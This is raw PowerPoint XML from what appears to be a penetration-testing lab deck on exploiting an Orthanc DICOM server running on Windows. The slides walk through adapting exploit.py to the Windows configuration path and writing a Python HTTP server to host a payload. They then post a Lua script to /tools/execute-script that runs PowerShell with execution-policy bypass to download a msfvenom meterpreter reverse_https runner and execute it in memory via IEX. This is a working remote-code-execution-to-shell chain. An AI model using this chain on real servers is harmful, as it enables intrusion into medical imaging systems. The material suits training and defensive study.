            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>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1312371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48C3-D847-9033-8274-8D7AE2FA0D18}"/>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5A592A4F-BB3E-66CB-E133-8C5DA618CEE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exploit.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> script, attempt to exploit the server. If you have Wireshark running in tandem, you can view the transactions to see if you gain RCE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Did you gain RCE? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If not, why?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1813498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0642-ED4F-D851-FF62-278157C89F19}"/>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C5068F1D-CA04-CC77-0642-476D3BA43DFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reviewing the output shows RCE was not gained, but why?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you read the exploit it is targeting Linux, and we are on Windows, so we need to change a few things.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Path:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where are the Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Orthanc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> files NAMELY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>orthanc.json</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What happens when you correct the path?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can you put a full path?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4226694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0642-ED4F-D851-FF62-278157C89F19}"/>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C5068F1D-CA04-CC77-0642-476D3BA43DFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The path expected for Windows is Configuration\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>orthanc.json</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now re-run the script, did anything happen or change?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You should have been able to see the 31137 transaction at the end of the process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now to gain that shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Technically with the way LUA is, you can use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>os.command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> script and run system commands, adding yourself a new user, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, but shells are more fun.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2889175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8382-2BA9-ADF5-8217-2F478A58069C}"/>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A916BD55-6AA3-929A-CD4B-14D694FB4D8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using your proto python script, add a section defining the usage of an http server from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>http.server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in Python3. You will need to add the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>http.server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to your import.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>import base64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argparse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argparse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ArgumentParser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pathlib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> import Path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from time import sleep</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>http.server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>socketserver</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>import threading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>import http</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="998383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825F-AB84-3F71-517E-EA8741E05B8A}"/>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41E27061-6A92-45DB-C871-8B419EF9FA9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add the following under the commented out help section:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC1D88E8-94D9-C84F-1A8F-DFF0FBD04012}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="570673415"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838199" y="2420874"/>
          <a:ext cx="9230833" cy="2714651"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="9230833">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1262238880"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2714651">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>class </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>CustomHandler</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>http.server.SimpleHTTPRequestHandler</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>):</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>    def </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>do_GET</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>(self):</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>        global </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>server_shut_down</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>        if </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>self.path</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> == FILE_TO_SERVE:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>            </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>server_shut_down.set</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>()  # Signal that the file was requested</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>        return </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>http.server.SimpleHTTPRequestHandler.do_GET</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>(self)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3160118077"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3621484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825F-AB84-3F71-517E-EA8741E05B8A}"/>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41E27061-6A92-45DB-C871-8B419EF9FA9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next, make this modification to open the HTTP server. This is what will host our payload.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC1D88E8-94D9-C84F-1A8F-DFF0FBD04012}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2150023016"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="2782381"/>
          <a:ext cx="9230833" cy="3657600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="9230833">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1262238880"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2714651">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>DICOM_FILE = Path('</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>exploit.dcm</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>').</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>read_bytes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>()</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t># Python3 HTTP Server Settings</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>PORT = 81</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>FILE_TO_SERVE = '/test3.ps1'</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>server_shut_down</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>threading.Event</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>()</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>def </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>run_server</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>():</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>    with </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>socketserver.TCPServer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>(("", PORT), </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>CustomHandler</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>) as httpd:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>        # Serve until the specific file is requested</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>        while not </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>server_shut_down.is_set</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>():</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>            </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>httpd.handle_request</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>()</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3160118077"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3370494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825F-AB84-3F71-517E-EA8741E05B8A}"/>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41E27061-6A92-45DB-C871-8B419EF9FA9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lastly, add this tailing portion to your script. This will start the HTTP server in a separate thread then send the malicious LUA script that will execute a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> request to download the Metasploit runner and execute in in memory via IEX.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3041671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E697-27C2-5F35-6B06-AC3F58E7860D}"/>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6F08EA30-412D-4FDC-DB81-7D135D156728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># Start the server in a separate thread</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>server_thread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>threading.Thread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(target=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>run_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>server_thread.start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#Create Simple MSF PowerShell runner: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -p windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> LHOST=HOST LPORT=PORT EXITFUNC=thread -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>psh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-net &gt; test.ps1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>res = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>client.post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(f"{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>args.url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}/tools/execute-script", content='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>os.execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -exec bypass -C IEX(New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>downloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(\'http://172.16.0.210:81/test.ps1\')")')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315086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20BA-4E3E-DB56-5EEE-2F47FBCA6F64}"/>
              </a:ext>
